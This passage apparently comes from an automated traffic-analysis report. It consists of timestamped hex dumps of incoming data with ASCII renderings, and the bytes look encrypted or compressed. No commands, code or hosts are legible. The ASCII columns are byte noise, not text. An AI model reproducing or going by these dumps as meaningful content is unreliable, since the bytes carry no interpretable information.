                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2313INData Raw: e1 4a 3b 54 0b 3c d6 6a 72 99 f2 c8 9a 19 4e ea 48 bb 0d ab 4c 72 02 b5 4c b2 a5 36 ef e9 06 37 1d b4 c1 f8 2a 80 d7 86 8d 05 d6 12 cc 66 d5 fd a4 37 dc 04 fa 38 52 65 fd 1b 30 88 4f 22 14 fa c2 31 82 e1 89 e6 53 f4 e7 f3 85 89 37 01 7f 89 cf 7a 51 ce 98 ee 2e 38 79 d0 47 dd 37 a5 b0 2d f2 ae 6d 73 bd 80 cd 73 b2 cb fc 82 cc 84 a9 6d ed f0 4d 37 eb d3 dc 5f aa df fc 47 ce 6f fe 50 9b 44 b5 55 18 13 74 c9 3e 58 6a a3 56 b4 01 af 7d 8b e0 fd 35 92 c0 0e d3 eb 08 b6 32 28 6d 9b 49 a4 e0 17 f5 58 2a 5b c8 31 53 1d 94 40 47 a4 8c 38 83 7b b0 4e 9f 9c cf c3 56 51 12 b5 ac f7 69 e2 ac cd 63 c5 64 3e 4a a3 11 57 d7 1e 84 10 43 7f 35 9c ae 6c 62 f4 73 40 f5 4c d0 fb b9 2f 4e 43 9b f3 f8 0d e7 c2 9a 02 68 ab b5 9f f0 09 ea 07 91 ac 49 ec a9 c3 d1 0f 5a 5f 50 ae 34
                                                                                                                                                                                                    Data Ascii: J;T<jrNHLrL67*f78Re0O"1S7zQ.8yG7-mssmM7_GoPDUt>XjV}52(mIX*[1S@G8{NVQicd>JWC5lbs@L/NChIZ_P4
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2329INData Raw: 8c 5c ad 04 31 b2 87 a4 57 1f f5 1c 65 60 85 a3 d1 f2 72 41 4f d7 6d b8 a7 8f 34 a0 a5 b8 08 6a b2 38 21 1a ee bc 24 ed 98 17 56 6f 12 ca a1 5a 32 e3 17 9e 80 a9 d4 13 ae 8b 8e e9 57 43 1b 9e 13 bb f9 00 1b d5 16 ac c5 ab 1c f7 6f e8 82 1e 96 26 53 d4 f8 d8 e7 4c d8 91 3f 6e ec 8a a5 e5 69 b3 3f a7 2f 85 cf cc d5 1d cb 65 f9 3e 67 9c 2e e2 01 52 91 1f dd 4f 82 c2 3c 56 70 ff 96 b7 07 61 06 ee 76 01 46 d8 9c 91 48 38 a7 a3 54 4a 2d 64 ab 32 a5 89 a9 ef a2 50 e1 4f 6c 54 fb 99 2d 6a 6a 1a e1 df b0 3d 05 cd c2 5a 3f c2 ee 03 9e 67 99 9c f4 8d 99 e8 4e 20 d7 33 56 51 6c 93 63 be c9 0f 06 d9 18 bd af 80 f9 6b e5 7c 0a 99 ca 07 22 25 94 66 b9 57 77 0c 73 5d c2 d0 23 fc 54 03 88 71 70 5a 88 bd bd dc b6 9b f2 94 fa 02 ee 0b 88 f8 cc f3 82 96 53 95 4e 96 b4 c9 72
                                                                                                                                                                                                    Data Ascii: \1We`rAOm4j8!$VoZ2WCo&SL?ni?/e>g.RO<VpavFH8TJ-d2POlT-jj=Z?gN 3VQlck|"%fWws]#TqpZSNr
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2345INData Raw: 7f c4 9c 0f 2f 68 f0 ae b2 2e c8 82 0f 72 15 b4 77 dd b5 50 11 8f c2 9c 2a f5 1d 42 68 07 7b 38 f3 83 3d e6 97 b0 84 15 31 9f c0 4d 44 a9 49 0c ec 34 68 5b 8f 18 c2 c5 e4 f4 62 3c b7 ce b1 b0 05 bf 4f 01 87 ba d3 f5 f4 61 5a 0f 0d 07 dd 65 6b 11 49 4b 5f a9 6f a8 ee d5 07 85 5e 0d 40 c7 14 13 31 3b bf 55 6f 46 ab 75 d6 c2 b0 a6 ef f2 17 4e 01 84 36 b9 9a 00 b6 b7 3b f3 d0 5d 03 9c 43 22 62 f2 d8 e5 43 fd da e4 fc ee 97 59 bb 19 65 40 52 ca c8 e4 a3 4d 4b 93 2d 78 97 c8 19 ca 7e 15 78 47 ff 2f e1 d7 e5 60 3b 7e f0 0f 8c 90 9a 34 f2 4f 29 2b 09 ea c8 ab a9 84 bd b0 2d 7e 61 bf d4 3f 18 de 6f a6 c3 aa 1f 33 e6 aa 2d 34 6d 60 3f 79 db ba b8 a9 61 56 6c 7e 41 5e 12 c0 1d a7 d6 5b 57 2f f9 cc 6f bd ee e5 d5 6e 76 99 bd ab fe 26 d1 a5 80 b0 bb cb fa 7b 5e 48 a9
                                                                                                                                                                                                    Data Ascii: /h.rwP*Bh{8=1MDI4h[b<OaZekIK_o^@1;UoFuN6;]C"bCYe@RMK-x~xG/`;~4O)+-~a?o3-4m`?yaVl~A^[W/onv&{^H
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2361INData Raw: a5 13 49 c2 b9 74 10 fe 75 d1 d1 27 53 93 81 f0 55 48 bc a8 d2 3d 73 f4 2c 93 3f 24 6c 8a 75 ce 38 6e c5 86 d7 a6 12 47 cf 57 12 89 e0 77 e1 bf 15 a9 4d 8e eb d8 9d ca c0 4f 51 e9 32 35 b6 dd 11 df b6 87 fe 5a 26 e1 0f e1 73 87 0d 35 f7 d3 f8 99 8b 8b 6f 7d f5 3e 4d 92 13 66 60 3d e1 ee 15 6a d1 d9 8b 33 f9 96 c9 f9 57 5d 5c 35 9a 53 22 56 42 33 4c d5 61 86 c2 80 5d 88 ec 80 46 09 71 75 fd d0 00 43 05 e9 43 56 f9 79 0b 7b 2a 4b 8a 28 b9 18 2b 0a a9 e7 34 58 08 49 f5 d9 3e 51 dc 5c 4b 02 aa 1d 9b da 03 3c ef 26 7c d6 53 ad 6e 8f 2a b2 29 b1 8a 71 b5 f4 f7 6f 8d 3d 0d 58 09 be 66 a8 a7 4f da 88 e1 36 3e b9 cc e1 9a 7b a9 a5 fe bf c7 d5 0a 4a a3 58 34 fe 97 e5 b5 ab 1b 43 c4 96 7e 48 cf 83 de a0 f1 ed c9 9a 4f 9f 7c 0f 71 be d9 47 17 1b f5 24 db a9 6b 12 f5
                                                                                                                                                                                                    Data Ascii: Itu'SUH=s,?$lu8nGWwMOQ25Z&s5o}>Mf`=j3W]\5S"VB3La]FquCCVy{*K(+4XI>Q\K<&|Sn*)qo=XfO6>{JX4C~HO|qG$k
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2377INData Raw: f3 c3 1a 9c 63 bd 39 11 ef 08 79 b0 b9 59 18 57 62 4e e4 29 39 d0 bf 1a 69 72 12 ef 42 4f bc 54 99 f1 ac 2d d0 72 d8 9c 1f 41 11 71 89 90 0b 7d cf c2 34 2d 98 32 2d f3 1a 38 c2 47 92 50 0f c3 6c 22 95 a9 ac b7 00 ac cb c8 82 11 89 82 d3 52 81 a1 a7 07 ee cd 7a 3b ab f2 22 e3 d1 49 61 d1 0f 30 8d af 1d 02 5d 6d 00 71 75 e7 b3 8d 75 85 f6 fd ca 20 af 49 da e6 76 80 2b 28 96 3e da d6 6c d4 a4 e3 be 68 17 c0 9d d8 06 59 07 5a 4b 04 8f ed 37 b0 6a 9d c8 08 fb 87 1d 52 98 da bb 65 24 66 29 6c 8e 58 be 0f 1d 33 a7 6a 14 dc 11 91 12 a1 4b e6 04 89 ea 65 bb 0d 0b c8 32 b9 de 07 d9 fd 94 09 36 ed a7 59 2d 03 c1 44 49 b7 d9 bd 6c 0a a6 f6 93 de 4b af bd a1 00 a6 bd 1b be ee 0b 1a eb 12 24 4e bd 0a 4d 85 05 72 7d e0 c6 19 fe ab d7 2e b2 ae 70 f2 22 ac 8e 45 a2 15 88
                                                                                                                                                                                                    Data Ascii: c9yYWbN)9irBOT-rAq}4-2-8GPl"Rz;"Ia0]mquu Iv+(>lhYZK7jRe$f)lX3jKe26Y-DIlK$NMr}.p"E
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2393INData Raw: a2 ae bc 7a cf 8b 17 9d 1e f8 3f 9c 8f a9 94 08 9a 2e a0 d5 b5 56 1d d2 62 94 12 ff 3c 79 1d 91 95 26 f4 08 92 c1 f2 50 57 89 cb 96 00 a6 e2 eb 09 72 f0 9f 55 60 54 ab 95 61 e2 82 15 f8 6a e0 d8 32 f2 42 3e 14 ec f8 ef 1e 5e d2 4b 12 b6 b2 80 61 6f 4d b0 a6 83 8e 7b fa c8 15 1d b6 cc 36 ca d2 61 7b 44 d3 83 ad 51 1c f6 2d 48 44 51 5b ae fc 89 f2 eb 6b b3 22 4c 3b d4 34 7a f0 e5 0c 6a 7c 10 02 d1 36 82 8c 64 ae 24 69 dd cb 99 83 10 7c a8 f1 43 4b 48 fd 62 b8 8e 76 5e b6 ff 34 f6 e8 08 97 b2 3b 69 0b 60 8d 18 f7 be 86 15 1e f2 77 d5 0b d7 2b 40 53 17 e7 3b 21 7a 4a b7 25 19 84 55 77 e7 5a 8b 11 08 6b ea b1 aa 6a 70 22 01 90 41 36 91 34 7c 66 d3 dc 1e a7 c7 7a 3c 71 92 28 c2 32 48 a8 aa 9f 8c b6 0c c4 3f 88 f8 7a 05 14 05 02 a7 bf 36 5b aa a1 b5 c5 c6 1b dc
                                                                                                                                                                                                    Data Ascii: z?.Vb<y&PWrU`Taj2B>^KaoM{6a{DQ-HDQ[k"L;4zj|6d$i|CKHbv^4;i`w+@S;!zJ%UwZkjp"A64|fz<q(2H?z6[
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2409INData Raw: ff bd 09 5f e8 d6 36 5a b4 e4 92 ee d0 23 bc 94 7b cd ad 3c 7f 6f ca 38 5b 20 5d cf cf e4 f3 b7 e3 83 be 43 6b 8c 37 77 93 10 f4 19 ad eb 69 30 e8 46 6c 8c 0d a9 49 81 50 d5 6b 70 0f ac 30 a7 79 e3 54 ba cb fb 46 48 16 ec c1 11 e4 f6 9f d7 e9 b8 65 e2 bf 68 f4 40 ab a2 37 07 86 fe 24 e6 a4 74 0d 39 48 8e 04 08 27 b1 ce 73 ce 05 44 3e 82 23 1a f8 fe 01 b0 bd 54 2c de 06 2a 4c 30 e0 c5 eb b2 2c 20 f0 df a9 cb d9 8a 9c a1 21 60 22 3f 6d f5 f2 36 df d3 41 a6 63 25 49 f2 bf 1b 86 c9 43 1d 36 5a 3a 91 d8 2e ec 27 1d 3b 52 4b c4 f5 99 39 17 43 b0 0a b6 86 3c 86 8c 2e 1e 2d 41 c3 46 b7 5f 8c 48 4a 93 3a 4b 94 f7 e5 00 95 15 f0 05 f5 47 37 55 b5 61 88 75 9c 61 aa 14 33 78 46 a5 3f 69 2d fa f4 50 d9 a5 36 11 d9 e8 c8 0e 83 9f 6d 79 88 16 a2 fa 2b f0 5e 82 fe 71 91
                                                                                                                                                                                                    Data Ascii: _6Z#{<o8[ ]Ck7wi0FlIPkp0yTFHeh@7$t9H'sD>#T,*L0, !`"?m6Ac%IC6Z:.';RK9C<.-AF_HJ:KG7Uaua3xF?i-P6my+^q
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2425INData Raw: 29 de 12 e3 ae 3e 52 e8 9b ed d7 a3 5b ec c5 f7 4b 8f 05 05 16 d7 c7 da a5 b0 8c 99 36 5b be c8 5b e5 9c 8e 9f 54 57 56 e9 7f f3 b8 04 e4 c4 cf 0c 29 7a 9b 5f 35 f7 bd 08 56 07 ab 96 e1 60 af af 41 3a 8a 5f 35 d5 2d 3b b3 77 69 8d 58 7c e4 78 9c 2b 91 c5 02 48 71 27 d3 09 0e 8e b9 27 91 75 68 b8 b9 e5 21 f3 e9 b7 c9 2a 79 55 53 4d a7 58 2a e2 45 07 85 a7 e2 3d b7 96 e8 a5 5d 3f 39 31 df c9 90 02 68 ae 6e aa 2c 6c a6 1f 4b 7a 7c fd 69 db cf c4 0e a9 65 9b 05 6f 03 38 42 00 15 4e 83 f8 0b 79 38 60 c3 52 25 17 c5 fa 2d f9 72 83 ef bb 6f a1 dc 9e d3 a6 65 58 94 b0 11 89 e0 10 a0 21 ae d5 e3 47 d2 c6 29 d2 c6 33 17 f3 53 7e 4a 86 92 b8 af 2f 48 fd bf 9e 5b 51 5d eb 60 62 a7 ad ce d2 e5 d0 67 34 0b 07 87 fb 6e 18 a2 33 a4 4e 8e b0 1b 42 2c 6f 6f fe 73 3f 6c b4
                                                                                                                                                                                                    Data Ascii: )>R[K6[[TWV)z_5V`A:_5-;wiX|x+Hq''uh!*yUSMX*E=]?91hn,lKz|ieo8BNy8`R%-roeX!G)3S~J/H[Q]`bg4n3NB,oos?l
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2441INData Raw: 70 aa 4a 60 a2 7f 87 c8 5a 76 b2 d4 5a d6 af 89 a0 48 df ae 43 a9 b9 c6 04 ba 03 8a 47 61 ee 72 32 14 30 2e 9e 98 f2 4d e7 a7 e5 32 e3 d8 c0 53 e2 f7 f7 2c 37 1e c9 67 e3 2c 75 8a dd f2 86 6b 4e 73 bc 23 9c 55 5d 31 71 2d 91 38 93 5a db 81 f3 9e 48 bc b5 41 a8 d3 38 f2 33 b2 7e 02 4d db c7 f3 07 8e a1 b4 9c 52 4d 1f 55 4d 7e 9d 64 89 b3 c0 e2 8e ef 5b 92 46 9c 63 2b 52 28 3c 1a ed 7f 9b ef b8 4c 67 87 68 e8 7a e6 06 e9 2e c5 1c fa 27 87 a5 92 a5 b1 14 15 91 97 ba db 4a d1 8a d8 53 07 90 28 e2 6f b5 77 6f 2f 75 9b 7f dc 20 5b 01 0c 99 96 42 f7 f0 d0 4f c6 ae fe e8 67 de c8 11 81 f2 0b fa ab 71 b6 5f 13 0b 17 7a 73 3e 2f be 2d 66 e9 2f cb 45 e4 f3 4f d0 c5 3c f3 24 71 85 f2 89 de 1a f0 14 3a 86 c1 0e a1 87 77 cc f1 a6 2e 8b b5 32 c7 c9 ce fb 24 39 eb 10 60
                                                                                                                                                                                                    Data Ascii: pJ`ZvZHCGar20.M2S,7g,ukNs#U]1q-8ZHA83~MRMUM~d[Fc+R(<Lghz.'JS(owo/u [BOgq_zs>/-f/EO<$q:w.2$9`
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2457INData Raw: 58 50 24 cb 93 01 26 6d 2c d1 b2 bc 0b 8a 37 be 6c 1d 0d cc 3e 55 48 71 36 49 9e 24 bd 11 21 a3 58 09 b4 e7 d3 d6 57 1e 40 a4 d7 08 2c 99 da c0 de ef 03 d3 66 60 7c 6a f2 57 f9 4c fe 77 82 94 78 c3 ba 6c 8c e0 02 19 cd 32 89 e1 af 56 43 7a da 4c 19 34 c2 98 ed 77 20 05 82 0b 9e 78 c7 9c 9c f5 a2 8e 19 c9 69 ec f8 95 de 57 62 70 e2 f7 42 29 07 a0 42 0a 7f ac 2f f8 a4 83 23 38 cc 0a 43 87 8f 27 48 37 e3 45 f4 2c 1e 3b 09 98 46 8a 55 5f ab 27 b1 2c 77 5b 44 bc 88 94 64 35 3d bb 68 74 c5 ef b8 45 b5 bc f1 29 55 f4 e3 48 e5 77 c0 a5 c9 ff f6 4b c7 c9 74 47 a9 47 73 31 af b3 9b 95 7f 5a d6 cd 90 ff de 2e 62 bb ad cd e1 51 97 1e 97 b9 5a 5b 8a 12 94 33 6f 05 57 d0 2a a7 4b f9 ef f2 3b d4 d5 60 38 08 f0 b9 80 ac 32 ed 7b 2d 20 42 0d d2 cf a1 b0 c9 0b 9a 26 2f d7
                                                                                                                                                                                                    Data Ascii: XP$&m,7l>UHq6I$!XW@,f`|jWLwxl2VCzL4w xiWbpB)B/#8C'H7E,;FU_',w[Dd5=htE)UHwKtGGs1Z.bQZ[3oW*K;`82{- B&/
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2473INData Raw: 71 c6 37 bd ab ad ba 72 26 48 36 0a 12 61 d8 fe 72 f6 92 1b 80 93 8b 9d 02 57 c9 ea 2a 31 90 ee 1a 0f 10 46 ac 12 5b 8e 7d 57 52 9d a4 d1 4d c6 a2 ff ba 8a 45 5a 82 e1 61 33 4b ab b9 f0 87 42 83 c5 7d a8 84 79 86 fd 45 2a c4 7c ac d8 c2 c3 f2 90 0f 12 a9 f7 d8 a4 a9 54 cc 23 4b 0b d5 02 d1 9e 3d 84 63 76 72 0f b8 3a 00 1c 73 16 56 a1 ff 0f 7d 71 db 57 c9 cd 89 9a 6b 6f 3b 10 bf a8 ac 4a 9e 3a 2e b0 83 60 0b 93 da 52 e4 9c 60 ff 21 44 15 fa 37 d4 c8 4a 36 29 53 d5 da aa 2e a0 02 67 ff 6a fa 0f fc f5 3e 03 66 bb 2f c8 0d 56 87 6b bc 7d 6e f4 bc e3 ae ab b6 7d c8 b3 ef 38 92 56 e7 b3 3f d7 fd 93 ec 3b bc 2d b6 a3 6b c1 c5 a7 57 75 8c 30 da 42 cf 96 34 e2 a3 f6 3c bf a8 a9 b7 27 67 d8 e9 72 64 51 b2 d2 37 d0 31 2c cb 2f a8 ac 6d ef 43 38 5e 24 44 0d 3e d5 e2
                                                                                                                                                                                                    Data Ascii: q7r&H6arW*1F[}WRMEZa3KB}yE*|T#K=cvr:sV}qWko;J:.`R`!D7J6)S.gj>f/Vk}n}8V?;-kWu0B4<'grdQ71,/mC8^$D>
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2489INData Raw: f0 55 08 60 41 76 77 ed 82 36 4f 65 32 54 06 77 6c ae 9a b7 e8 09 dd 82 2e 60 19 a2 f1 39 64 0e ee e4 ba d9 52 e8 cf 51 81 f5 4f c0 0b 1d 44 a0 28 f5 9a 3c ca 0c 3b 30 8d c2 d8 8e 59 10 29 2c f5 3a d6 90 e0 72 ad 4f f2 33 5f 73 9d 28 11 a2 fd 4c 03 31 d7 89 c2 9f 06 7f 21 9c 09 2d e4 88 74 7e 0e c4 03 9a ab ae 42 5d 9b 0c 98 58 4b 89 40 b4 a0 02 32 7d bf 6e 22 f0 0e a5 22 03 2b 28 33 49 cb 54 a6 09 63 79 8c b3 14 0b 95 17 2d 96 d0 27 9a e0 d9 24 b5 f2 5b 05 cd b1 3a c4 81 f3 47 cc d4 b8 c0 35 1c 3e a3 84 6c b5 ca 31 bf f6 bf 81 cb 35 19 9b 13 0c 99 06 a7 1b b6 b4 79 42 ca b2 11 c7 0a f4 f8 11 0b 13 d0 da b9 51 47 5c 33 05 9e 93 eb ce 16 33 fd 44 3e 9f 46 8f 70 27 0b 95 d3 6b 52 87 41 d9 a7 f2 55 11 18 ff 8c 41 60 5d 94 0e 51 03 a9 29 c9 51 76 2c 9e 8d 85
                                                                                                                                                                                                    Data Ascii: U`Avw6Oe2Twl.`9dRQOD(<;0Y),:rO3_s(L1!-t~B]XK@2}n""+(3ITcy-'$[:G5>l15yBQG\33D>Fp'kRAUA`]Q)Qv,
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2505INData Raw: 5a 7a 94 9c a0 39 ed 19 35 01 a1 3f 78 11 88 9a 0e 30 d2 99 21 19 88 e6 24 ca a9 89 08 b5 c6 43 87 4c e7 5d ee e5 ef 6a d9 ca 7a 30 62 90 df 43 15 ec 87 57 db 55 8d 0b 5e bb 80 f1 46 5e 5b 27 eb 12 f4 84 ab 0c a6 5e a4 4d 6b bf 10 b9 a8 65 66 6e f9 50 60 71 0f 3d 78 0d 33 9f 7c 2c 70 79 54 0e 8e 48 b4 80 69 d0 a5 ab 3d 84 70 20 57 26 fd 4e 3e a4 12 f0 9d 6e 28 31 1c 9c 7e 1e 84 c3 52 a4 b5 85 25 3e be f6 fc ff 25 d7 c1 19 cb 52 c0 dd f3 dc 5c 42 24 96 f3 95 58 d2 19 5b ca 1f 3f 7b 3c 78 91 05 36 97 d4 1b 29 cb 18 83 ea 70 18 e1 47 76 03 7d 58 30 55 f1 78 e0 75 61 5b 51 01 e4 c8 c2 60 ae 59 be 24 8f 9f 91 5c 22 ee 91 84 1f 7f 56 7b e0 33 e7 bd 6c 51 62 fb f1 93 da 7f 45 59 30 fc c6 22 39 61 5d 96 32 18 59 4e 42 33 d7 09 67 ea ad a7 16 f1 ca 01 57 ed 4a c0
                                                                                                                                                                                                    Data Ascii: Zz95?x0!$CL]jz0bCWU^F^['^MkefnP`q=x3|,pyTHi=p W&N>n(1~R%>%R\B$X[?{<x6)pGv}X0Uxua[Q`Y$\"V{3lQbEY0"9a]2YNB3gWJ
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2521INData Raw: 16 2e 27 67 aa 9c b9 1a 70 25 82 3e 0b 66 1a 04 22 6d 21 7a 65 d1 27 e2 54 5d c0 65 1f 1f 64 f8 f3 87 42 0c fe 54 38 53 c4 37 e6 86 28 c2 16 f0 f5 fd 32 22 d7 a4 27 c0 cb d3 ed 37 e1 75 94 41 a1 38 b0 70 2b ef 45 5a 35 51 12 2b ce 59 0c 0c b9 b4 9e 9d c3 70 99 19 85 6a 92 44 c1 1f cd 39 b6 d0 8e 79 e0 43 b7 80 2c 72 15 89 f4 f4 3d 1b ec cc 25 00 52 03 a2 3e 80 23 d0 a7 5a 15 8c 32 0e f7 97 5b b0 a4 ce d1 2f 05 02 00 1a bd 12 62 12 6d 1f ef 73 02 0b de 9d 33 02 83 cc 7d fc 77 6b 3f b9 4d ab 02 91 67 8f b5 cd 12 75 7e 95 36 35 4f 6d 93 76 c6 f1 d6 50 63 71 1a d3 e8 cc cb 89 13 ed df 61 63 cb fd e3 7c 4c a7 b7 36 49 ba a4 c1 32 f7 f3 e1 59 b9 1a 18 83 86 bf f7 cf 63 51 e3 cd c0 83 d1 ed 80 17 2b ac 6b 5b c4 0a 54 26 39 e1 32 c4 09 b6 1c 71 bc 4c aa 22 82 ad
                                                                                                                                                                                                    Data Ascii: .'gp%>f"m!ze'T]edBT8S7(2"'7uA8p+EZ5Q+YpjD9yC,r=%R>#Z2[/bms3}wk?Mgu~65OmvPcqac|L6I2YcQ+k[T&92qL"
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2537INData Raw: 59 5e 42 42 4a 04 43 1a ff 8b 4f b2 c7 25 e7 31 2a b1 5c 92 4e 36 bf 8d 97 ae 65 d9 5d ff 30 43 c6 0f d0 26 4e 22 9e 2d 40 a4 f0 90 02 1d 1a 9c 4e f8 10 f4 13 ef 74 12 30 42 eb 42 95 99 06 89 ac df 35 53 df 7b e6 dc a2 5a 1c 1a c0 09 71 e4 8f f7 7e 2d d5 72 8e c9 bf 68 d0 51 d6 1c 01 fc 71 00 5d b4 d1 90 e3 10 45 1d 89 c1 05 6d 15 c4 14 ad 28 42 9b e1 6f 5f 80 1a ce d6 95 50 a6 3b 92 89 88 7f 63 69 1c dc c1 53 a7 5a b4 30 84 64 0a 3c a9 5e 55 d4 4f 48 5f b3 04 b5 3d 85 00 2a 92 6e 92 26 90 cc d0 1f 08 e4 55 a2 ba 40 4c 08 7a b7 84 ab 77 25 ec cc 17 1d 04 7b b0 26 98 55 14 17 7e ee 06 10 04 9e f2 6c 63 23 41 90 48 bb f9 95 31 58 3b b1 81 c3 6e a5 61 41 ba 68 83 de 1a 4d 37 60 a6 15 77 19 87 28 95 5b 23 53 56 da 8f 5a 02 37 5f f7 56 96 62 58 41 5a 7f 22 18
                                                                                                                                                                                                    Data Ascii: Y^BBJCO%1*\N6e]0C&N"-@Nt0BB5S{Zq~-rhQq]Em(Bo_P;ciSZ0d<^UOH_=*n&U@Lzw%{&U~lc#AH1X;naAhM7`w([#SVZ7_VbXAZ"
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2553INData Raw: 79 98 5c 00 98 2d 20 16 ce d9 47 01 07 ff e7 81 32 14 07 af 29 33 d2 37 96 94 3f f7 c4 93 bb a3 1f 4d 66 73 49 2e 01 ba a1 90 55 01 08 1a 24 2c c0 4d 08 54 fb f6 bf 54 91 ae e6 39 d8 87 37 1c 34 da 3d 0f d7 bc 0c fb 31 10 65 9b 08 53 44 8a ed 9f ef e6 57 26 06 83 59 d8 2c 66 53 14 80 3d 06 3d 64 25 d7 0c 1b 47 dd 78 7a 5d 2f 4a 5b bd 6d 53 cf e8 6d 0c f1 ce 3a 2a be 68 5b 18 1c 37 f4 e3 8e f7 46 eb 60 1b 2e e5 fe 27 d7 d3 e1 12 b9 0f 93 e4 20 d5 2f 7e 71 c2 b5 9c 74 d4 6b 88 1d 72 2c 10 67 df 06 fa ad 16 fa 64 a6 4f 5c 8d 82 2e 73 c4 8f b5 1a 6a 28 73 ca c5 2d 2d 72 03 4e 08 54 66 51 eb 83 27 06 2f 8e 24 b9 f9 d8 46 4e 8d e0 f5 34 dd 9a 21 48 8d 78 9b 17 58 3c 0f c4 3a cb 7d be e2 cb d7 df 80 0f 39 d3 a7 2d 7c 2f 71 71 cc 07 1e e9 f7 9b d2 f9 91 42 fc a4
                                                                                                                                                                                                    Data Ascii: y\- G2)37?MfsI.U$,MTT974=1eSDW&Y,fS==d%Gxz]/J[mSm:*h[7F`.' /~qtkr,gdO\.sj(s--rNTfQ'/$FN4!HxX<:}9-|/qqB
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2569INData Raw: 26 c3 0a c2 7e d0 17 93 3e d3 19 87 ea b9 ea 33 78 c0 72 8b 34 6d ac c6 fd 54 fc 43 6c d7 de 21 bb 22 79 24 c9 2b 6d d2 57 a8 a5 d8 61 61 c8 42 c7 c8 46 c8 1d 80 94 25 18 94 d0 76 04 ef 0b 12 8b 9d df 1e 00 34 8a e4 e7 ec 2a ee f0 14 f7 cc dc 11 a0 74 fa 69 4d 8e 3c c9 d2 f2 eb 8e 56 fb 7c 18 66 66 a8 15 93 b1 b4 ce b8 d2 b4 e0 b3 97 28 87 08 d4 2b 4b d1 e4 b9 62 e5 2c 1e 80 59 db 63 50 22 42 15 34 c4 d9 a3 8a 3a 43 d8 71 3a 18 97 b3 0e 61 6e 25 00 5c dc e4 2e 20 d0 50 10 0b f2 b5 3f 28 15 8f 05 64 94 f9 37 f4 3b 2a d6 3e 5e 67 2a 64 1f e2 79 64 1f f6 27 c1 22 d5 41 6d cd 93 2c 88 a7 c4 f3 1f 7d 30 94 a7 0d 37 19 64 68 51 96 b3 25 28 9e 20 2f 35 eb f8 89 f9 d3 ad 24 9c 89 dd 20 c1 54 04 ce 81 47 71 48 41 8e 85 63 5d 7e d8 19 7b 46 3f 1f 08 ee ec 8f 3a de
                                                                                                                                                                                                    Data Ascii: &~>3xr4mTCl!"y$+mWaaBF%v4*tiM<V|ff(+Kb,YcP"B4:Cq:an%\. P?(d7;*>^g*dyd'"Am,}07dhQ%( /5$ TGqHAc]~{F?:
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2585INData Raw: df 2c 31 3b 5b 8e ef 66 dd 43 f0 7e 91 ce 9b 80 8f a6 62 29 fe 34 59 9a 48 86 98 8e ba 9b cd 90 7d 79 24 58 72 c1 19 6c 17 aa 86 c2 e5 da 9b 6f f1 c9 08 ef 64 84 cc 27 41 9e d1 20 02 ae fe b3 51 6c 1a e1 1e 61 fb 4a c8 91 f3 b8 09 dd 8d b2 e9 58 b9 9c af ba 12 a9 61 93 6e 3a a1 67 92 cf d0 c2 f1 63 53 a6 28 6a 2b 09 f2 6a dd 43 eb a2 b3 0c 7d 49 29 c3 46 d7 a3 cf 76 ca 54 07 97 96 6c 43 9c bf a3 42 cb 8f 35 39 45 e8 17 6d 83 71 d3 fd 3b 8b ce d9 64 fb b5 ea 3c fe e3 2e 8a d1 47 16 0c f7 62 a8 75 66 29 f7 7f f9 4f d1 ad 72 2d 46 b9 b0 cf 17 37 c0 14 9a 73 1d a3 76 57 0a c6 6e 41 95 8c e5 28 6d d4 81 b9 32 21 56 2c ba 67 c4 b9 86 8f ac 61 3c 48 19 3d a3 0f 17 fb ba 33 5f d3 10 22 4a 94 5d e9 4c 45 a0 8b 04 77 fe ba d9 0d 11 45 57 94 f4 0c 3f 87 44 2e 90 07
                                                                                                                                                                                                    Data Ascii: ,1;[fC~b)4YH}y$Xrlod'A QlaJXan:gcS(j+jC}I)FvTlCB59Emq;d<.Gbuf)Or-F7svWnA(m2!V,ga<H=3_"J]LEwEW?D.
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2601INData Raw: 38 ea a9 7c 66 40 25 c0 ca f0 89 ee c7 2e 1c f7 21 d2 68 80 aa 49 44 06 e7 df 1d 80 37 a4 b0 76 1b fc 1d de 55 99 00 d7 49 fa 8a 2c 8c 51 fa 10 f4 98 1a 33 1a c2 5f ad 14 e9 b8 32 64 7a d9 5a 9e 57 4e ea ff 90 04 86 cf 69 58 b5 ac df c8 f0 e3 0e 73 8e 1f 4c 8f 88 b0 71 b8 a5 4b 2b 3e 3b b1 9d e2 9e 06 4c 7f 65 48 a9 73 1b d9 67 54 93 f8 1f 0e 76 02 7d b5 7d 53 51 70 ed bc f7 97 83 55 b3 c3 35 ba 37 21 05 74 58 ef 0e 29 94 e5 25 ac a6 e9 1e c7 51 a7 b2 67 35 40 e6 39 12 8f 97 42 89 67 a3 4c 53 f5 d4 08 cb 8e 1a a0 5a ca db ca 9a 28 a5 89 41 4c f8 3e 58 7d b9 6e 7d 4a 2a c8 95 fc f6 d9 d4 b7 c9 a5 67 d2 e1 40 d7 21 b3 b7 30 e8 0f 27 d6 a1 46 3c 74 eb b7 5a 3b 10 e1 54 e9 77 a6 d9 ea 04 08 92 d4 eb 54 da 7f d1 c1 82 8b 52 05 66 0b c6 f3 3c d0 96 ac 40 69 2d
                                                                                                                                                                                                    Data Ascii: 8|f@%.!hID7vUI,Q3_2dzZWNiXsLqK+>;LeHsgTv}}SQpU57!tX)%Qg5@9BgLSZ(AL>X}n}J*g@!0'F<tZ;TwTRf<@i-
